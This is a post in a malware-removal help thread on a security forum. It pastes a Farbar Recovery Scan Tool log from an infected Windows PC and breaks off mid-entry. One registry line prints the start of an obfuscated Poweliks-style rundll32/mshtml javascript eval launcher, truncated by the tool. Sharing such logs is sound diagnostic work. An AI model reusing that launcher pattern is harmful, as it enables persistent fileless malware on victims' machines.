Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Reply to thread
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Support
Windows Malware Removal Help & Support
need help with fff5ee
Message
<blockquote data-quote="gski69" data-source="post: 290717" data-attributes="member: 30080"><p>Additional scan result of Farbar Recovery Scan Tool (x64) Version: 01-11-2014</p><p>Ran by Gary at 2014-11-01 11:02:50</p><p>Running from C:\Users\Gary\Downloads</p><p>Boot Mode: Normal</p><p>==========================================================</p><p></p><p></p><p>==================== Security Center ========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed.)</p><p></p><p>AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}</p><p>AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}</p><p>AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}</p><p></p><p>==================== Installed Programs ======================</p><p></p><p>(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)</p><p></p><p>64 Bit HP CIO Components Installer (Version: 7.2.4 - Hewlett-Packard) Hidden</p><p>Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated)</p><p>Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)</p><p>Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)</p><p>Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)</p><p>Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)</p><p>AML Free Registry Cleaner 4.25 (HKLM-x32\...\{315F5FFC-1A5C-4A2A-B8E7-1C5B1174C198}_is1) (Version: - AML SOFT, Inc.)</p><p>Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)</p><p>Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)</p><p>Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)</p><p>Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-4300-76A7-A758B70C0700}) (Version: 12.7.0.15 - APN, LLC) <==== ATTENTION</p><p>ATI Catalyst Control Center (HKLM-x32\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.009.1209.2334 - )</p><p>AXIS Media Control Embedded (HKLM-x32\...\AXIS Media Control Embedded) (Version: - )</p><p>Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)</p><p>Canon DIGITAL CAMERA Solution Disk Software Guide (HKLM-x32\...\Software Guide) (Version: 1.5.0.1 - Canon Inc.)</p><p>CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.)</p><p>CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.)</p><p>Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.)</p><p>Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.7.0.3 - Canon Inc.)</p><p>Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.8.0.5 - Canon Inc.)</p><p>Canon PowerShot SX230 HS and PowerShot SX220 HS Camera User Guide (HKLM-x32\...\CameraUserGuide-PSSX230HSandPSSX220HS) (Version: 1.0.1.2 - Canon Inc.)</p><p>Canon Utilities CameraWindow DC 8 (HKLM-x32\...\CameraWindowDC8) (Version: 8.5.0.7 - Canon Inc.)</p><p>Canon Utilities CameraWindow Launcher (HKLM-x32\...\CameraWindowLauncher) (Version: 7.5.0.2 - Canon Inc.)</p><p>Canon Utilities Map Utility (HKLM-x32\...\MapUtility) (Version: 1.0.0.19 - Canon Inc.)</p><p>Canon Utilities Movie Uploader for YouTube (HKLM-x32\...\MovieUploaderForYouTube) (Version: 1.2.0.7 - Canon Inc.)</p><p>Canon Utilities MyCamera (HKLM-x32\...\MyCamera) (Version: 7.4.0.2 - Canon Inc.)</p><p>Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)</p><p>Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.2.33 - Canon Inc.)</p><p>Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.1.10 - Canon Inc.)</p><p>ccc-core-static (x32 Version: 2009.1209.2335.42329 - ATI) Hidden</p><p>CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)</p><p>Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12284.0 - Cisco Consumer Products LLC)</p><p>Citrix Online Launcher (HKLM-x32\...\{B025BA0B-64A6-46DE-9D64-32965C83CCA9}) (Version: 1.0.179 - Citrix)</p><p>Corel MediaOne (HKLM-x32\...\{3C569633-C8DE-46E2-BB8F-F65198681C2F}) (Version: 2.100.0000 - Corel Corporation)</p><p>Corel Paint Shop Pro Photo X2 (HKLM-x32\...\{64E72FB1-2343-4977-B4A8-262CD53D0BD3}) (Version: 12.50.0001 - Corel Corporation)</p><p>Corel Painter Photo Essentials 4 (x32 Version: 4.0 - Corel Corporation) Hidden</p><p>Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)</p><p>Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)</p><p>Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited)</p><p>Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.02 - Creative Technology Limited)</p><p>D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden</p><p>Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 9.4.60 - Dell)</p><p>Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.60 - Dell)</p><p>Dell Dock (HKLM-x32\...\Dell Dock) (Version: - Stardock Corporation)</p><p>Dell Dock (Version: 2.0 - Stardock Corporation) Hidden</p><p>Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)</p><p>Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)</p><p>DesignPro 5 (HKLM-x32\...\InstallShield_{32821558-2C36-4FD0-A891-CA65360B0EC7}) (Version: 5.5.708 - Avery Dennison)</p><p>DesignPro 5 (x32 Version: 5.5.708 - Avery Dennison) Hidden</p><p>DirectXInstallService (x32 Version: 9.0.2 - Roxio) Hidden</p><p>DocProc (x32 Version: 140.0.99.000 - Hewlett-Packard) Hidden</p><p>Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)</p><p>Doxillion Document Converter (HKLM-x32\...\Doxillion) (Version: 2.17 - NCH Software)</p><p>EMC 10 Content (x32 Version: 1.0.035 - Roxo, Inc.) Hidden</p><p>EMCGadgets64 (Version: 1.0.302 - Sonic) Hidden</p><p>ffdshow [rev 2527] [2008-12-19] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )</p><p>FirstClass® Client (HKLM-x32\...\{5B35C417-2649-11D6-83D1-0050FC01225C}) (Version: 10.0 (build 10.009) - FirstClass Division, Open Text Corporation.)</p><p>Fitbit Connect (HKLM-x32\...\{D3CD091B-296B-48E9-9F0F-E9FE53E02E41}) (Version: 1.0.3.5511 - Fitbit Inc.)</p><p>Garmin USB Drivers (HKLM-x32\...\{510D2239-6C2E-457B-9590-485EC552D94D}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)</p><p>Garmin WebUpdater (HKLM-x32\...\{6C94A234-CA2C-4D3C-81E6-6AAA8069825D}) (Version: 2.5.5 - Garmin Ltd or its subsidiaries)</p><p>Google Chrome (HKCU\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)</p><p>Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)</p><p>Google Earth (HKLM-x32\...\{C768790F-04FB-11E0-9B2C-001AA037B01E}) (Version: 6.0.1.2032 - Google)</p><p>Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)</p><p>Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden</p><p>Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden</p><p>Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden</p><p>HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)</p><p>HP Officejet Pro 8600 Basic Device Software (HKLM\...\{2D5E3D2B-919F-407C-8757-E64827518BB6}) (Version: 25.0.619.0 - Hewlett-Packard Co.)</p><p>HP Officejet Pro 8600 Help (HKLM-x32\...\{B6F5C6D8-C443-4B55-932F-AE11B5743FC4}) (Version: 140.0.2.2 - Hewlett Packard)</p><p>HP Officejet Pro 8600 Product Improvement Study (HKLM\...\{F792E5B0-11C4-4C68-8A63-FB5F52749180}) (Version: 25.0.619.0 - Hewlett-Packard Co.)</p><p>HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)</p><p>HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)</p><p>HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden</p><p>I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)</p><p>iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)</p><p>Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation)</p><p>Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation)</p><p>iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)</p><p>Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)</p><p>Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)</p><p>Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden</p><p>Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)</p><p>MapsGalaxy Toolbar (HKLM-x32\...\MapsGalaxy_39bar Uninstall) (Version: - Mindspark Interactive Network) <==== ATTENTION</p><p>McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 12.8.988 - McAfee, Inc.)</p><p>McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)</p><p>Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)</p><p>Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)</p><p>Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)</p><p>Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)</p><p>MP3 Rocket (HKLM-x32\...\MP3 Rocket) (Version: - )</p><p>MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)</p><p>MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)</p><p>My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)</p><p>OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)</p><p>OpenAL (HKLM-x32\...\OpenAL) (Version: - )</p><p>Photomatix Pro version 4.0.1 (HKLM\...\PhotomatixPro4.0x64_is1) (Version: 4.0.1 - HDRsoft Sarl)</p><p>PowerDVD DX (HKLM-x32\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.3.6029 - CyberLink Corp.)</p><p>QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)</p><p>Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5951 - Realtek Semiconductor Corp.)</p><p>Roxio Easy CD and DVD Burning (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)</p><p>Roxio File Backup (Version: 1.3.0 - Roxio) Hidden</p><p>Sansa Updater (HKCU\...\Sansa Updater) (Version: - )</p><p>Savings Bond Wizard (HKLM-x32\...\Savings Bond Wizard) (Version: - ) <==== ATTENTION</p><p>Search-Results Toolbar (HKLM-x32\...\searchresultstb) (Version: 1.0.0.13 - APN, LLC) <==== ATTENTION</p><p>Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)</p><p>Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)</p><p>Skins (x32 Version: 2009.1209.2335.42329 - ATI) Hidden</p><p>Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden</p><p>Sound Blaster X-Fi (HKLM-x32\...\{20288888-A7AF-4B24-8AEB-398D20CD563C}) (Version: 1.0 - )</p><p>SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.0.1142 - SUPERAntiSpyware.com)</p><p>Switch Sound File Converter (HKLM-x32\...\Switch) (Version: - NCH Software)</p><p>TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version: - Intuit, Inc)</p><p>TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc)</p><p>TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)</p><p>TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)</p><p>TWC Customer Controls (HKLM-x32\...\{A2E5F2AA-2996-41EA-BCCD-9FD0476A5326}) (Version: 11 - SupportSoft)</p><p>VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden</p><p>Verizon Cloud (HKLM-x32\...\Verizon Cloud) (Version: - Verizon Wireless)</p><p>WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.96 - NCH Software)</p><p>WebEx (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - WebEx Communications, Inc)</p><p>Window Shopper (HKLM-x32\...\{A1570454-ED12-4050-A7AC-9282C7AFB23C}) (Version: 01.02.0003 - Superfish)</p><p>Windows 7 Upgrade Advisor (HKLM-x32\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)</p><p>Windows Driver Package - Garmin (grmnusb) GARMIN Devices (06/03/2009 2.3.0.0) (HKLM\...\49CF605F02C7954F4E139D18828DE298CD59217C) (Version: 06/03/2009 2.3.0.0 - Garmin)</p><p>Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)</p><p>Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)</p><p></p><p>==================== Custom CLSID (selected items): ==========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)</p><p></p><p>CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Gary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)</p><p>CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?</p><p>CustomCLSID: HKU\S-1-5-21-1776543140-210536247-3466770518-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Gary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)</p><p></p><p>==================== Restore Points =========================</p><p></p><p>30-10-2014 22:05:07 avast! antivirus system restore point</p><p>01-11-2014 00:42:11 Restore Operation</p><p></p><p>==================== Hosts content: ==========================</p><p></p><p>(If needed Hosts: directive could be included in the fixlist to reset Hosts.)</p><p></p><p>2009-07-13 22:34 - 2014-05-31 07:39 - 00450712 ____R C:\Windows\system32\Drivers\etc\hosts</p><p>127.0.0.1 <a href="http://www.007guard.com" target="_blank">www.007guard.com</a></p><p>127.0.0.1 007guard.com</p><p>127.0.0.1 008i.com</p><p>127.0.0.1 <a href="http://www.008k.com" target="_blank">www.008k.com</a></p><p>127.0.0.1 008k.com</p><p>127.0.0.1 <a href="http://www.00hq.com" target="_blank">www.00hq.com</a></p><p>127.0.0.1 00hq.com</p><p>127.0.0.1 010402.com</p><p>127.0.0.1 <a href="http://www.032439.com" target="_blank">www.032439.com</a></p><p>127.0.0.1 032439.com</p><p>127.0.0.1 <a href="http://www.0scan.com" target="_blank">www.0scan.com</a></p><p>127.0.0.1 0scan.com</p><p>127.0.0.1 <a href="http://www.1000gratisproben.com" target="_blank">www.1000gratisproben.com</a></p><p>127.0.0.1 1000gratisproben.com</p><p>127.0.0.1 1001namen.com</p><p>127.0.0.1 <a href="http://www.1001namen.com" target="_blank">www.1001namen.com</a></p><p>127.0.0.1 100888290cs.com</p><p>127.0.0.1 <a href="http://www.100888290cs.com" target="_blank">www.100888290cs.com</a></p><p>127.0.0.1 <a href="http://www.100sexlinks.com" target="_blank">www.100sexlinks.com</a></p><p>127.0.0.1 100sexlinks.com</p><p>127.0.0.1 <a href="http://www.10sek.com" target="_blank">www.10sek.com</a></p><p>127.0.0.1 10sek.com</p><p>127.0.0.1 <a href="http://www.1-2005-search.com" target="_blank">www.1-2005-search.com</a></p><p>127.0.0.1 1-2005-search.com</p><p>127.0.0.1 <a href="http://www.123fporn.info" target="_blank">www.123fporn.info</a></p><p>127.0.0.1 123fporn.info</p><p>127.0.0.1 123haustiereundmehr.com</p><p>127.0.0.1 <a href="http://www.123haustiereundmehr.com" target="_blank">www.123haustiereundmehr.com</a></p><p>127.0.0.1 123moviedownload.com</p><p></p><p>There are 1000 more lines.</p><p></p><p></p><p>==================== Scheduled Tasks (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)</p><p></p><p>Task: {0D0E0C78-9085-40BB-9DA1-A6A311F4D754} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-09-12] (Adobe Systems Incorporated)</p><p>Task: {10B76274-0B0F-4BF7-AE23-BB45807086D3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005Core => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe [2012-12-11] (Google Inc.)</p><p>Task: {128364DF-62BE-4496-BEB4-85764F5AA041} - System32\Tasks\{FD57F41E-8A42-4069-9428-1FD82EC3FB76} => C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\Corel Paint Shop Pro Photo.exe [2008-08-08] (Corel, Inc.)</p><p>Task: {15CCFE83-71ED-418C-9FE9-71BC632A6131} - System32\Tasks\Google Updater and Installer => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)</p><p>Task: {1A531B50-031F-4627-AAA2-FC13F3AB3582} - System32\Tasks\NCH Software\switchShakeIcon => C:\Program Files (x86)\NCH Software\Switch\Switch.exe [2011-10-09] (NCH Software)</p><p>Task: {23CC0D78-3019-46FB-B34A-FE9C3BF72769} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup</p><p>Task: {3F1009F2-451C-4EC2-AD21-7C6C7E974E39} - System32\Tasks\{1F5BD0A3-4C6E-4DB9-A9E8-80266B488190} => C:\WINDOWS\System32\java.exe</p><p>Task: {4757BA1B-4F91-4EEB-B072-3A957CE77D7E} - System32\Tasks\{F982F545-47C2-40EE-912E-65F95C9A4ED5} => C:\WINDOWS\System32\java.exe</p><p>Task: {53684FEC-2B33-4D35-95A8-8745D0199D2E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)</p><p>Task: {5A4177EC-C0E5-4B28-AAEB-82F2A2CF089E} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-10-07] (Oracle Corporation)</p><p>Task: {5EE44160-D04C-4E48-B6F1-8C7520C77E3C} - System32\Tasks\{9CEA4C11-4B96-4D0F-A1D9-2900B4D241D4} => C:\Program Files (x86)\iTunes\iTunes.exe [2014-08-01] (Apple Inc.)</p><p>Task: {6027B904-86DE-4514-8EDD-81BBE9E02EEA} - System32\Tasks\WebReg HP Photosmart Prem C410 series => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe</p><p>Task: {66B15493-FFA5-40E9-8C8B-3C3F05AC7C10} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)</p><p>Task: {6EB758DD-C293-4AEF-9AA6-86B3EC444F28} - System32\Tasks\{345D9C9E-DF51-4F9A-82F4-B6A0F9F6FCCB} => C:\WINDOWS\System32\java.exe</p><p>Task: {6FA4C38B-436F-4E1E-BDC1-60407E224988} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core1cf4afcedbeedb2 => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)</p><p>Task: {70836A92-C637-46B1-AA2B-D4AB80CE3DEF} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)</p><p>Task: {81CD3D09-2CF9-4E5C-96FF-BF090BB45573} - System32\Tasks\{53ECF6AF-7FB1-409F-8B6A-68B00AEF0EBF} => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)</p><p>Task: {81F60316-9CC2-435E-9BF0-6CA46BE59142} - System32\Tasks\{C5046DCB-B2CF-4243-901A-1B4DBF26E0AB} => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)</p><p>Task: {9158DE37-1BE6-4DB4-90C8-8216F2C4EFCD} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe</p><p>Task: {9552F2B6-4299-41BD-B5B3-0216BC564864} - System32\Tasks\{D2328B8F-70B9-402A-9F1A-8CDF4912E31A} => C:\WINDOWS\System32\java.exe</p><p>Task: {986D2D3D-1C63-4A00-ACF3-3B9C30D34AC5} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)</p><p>Task: {9CF3354F-CECF-476D-9877-3A7F5E4F370A} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe</p><p>Task: {A09CC7B8-8AFF-4775-9AAF-A399841E7F0D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe</p><p>Task: {B79108A1-CB55-46B5-97F0-9ADAD5D46EBA} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005UA => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe [2012-12-11] (Google Inc.)</p><p>Task: {BA1A4C2F-2F90-4A06-A751-AEE5C96C1562} - System32\Tasks\HPCustParticipation HP Officejet Pro 8600 => C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPCustPartic.exe [2011-09-09] (Hewlett-Packard Co.)</p><p>Task: {C751AE6A-6034-41E0-AD7A-22F5E0F13739} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA1cf23a95ab00a5d => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)</p><p>Task: {D5986A94-AA73-4F43-9286-4D500277077F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)</p><p>Task: {D78D5F68-12A0-4EAF-9EFA-A879F7FA34ED} - System32\Tasks\{D97670EA-AD07-4CB1-A8DC-2110A8AED5D5} => C:\WINDOWS\System32\java.exe</p><p>Task: 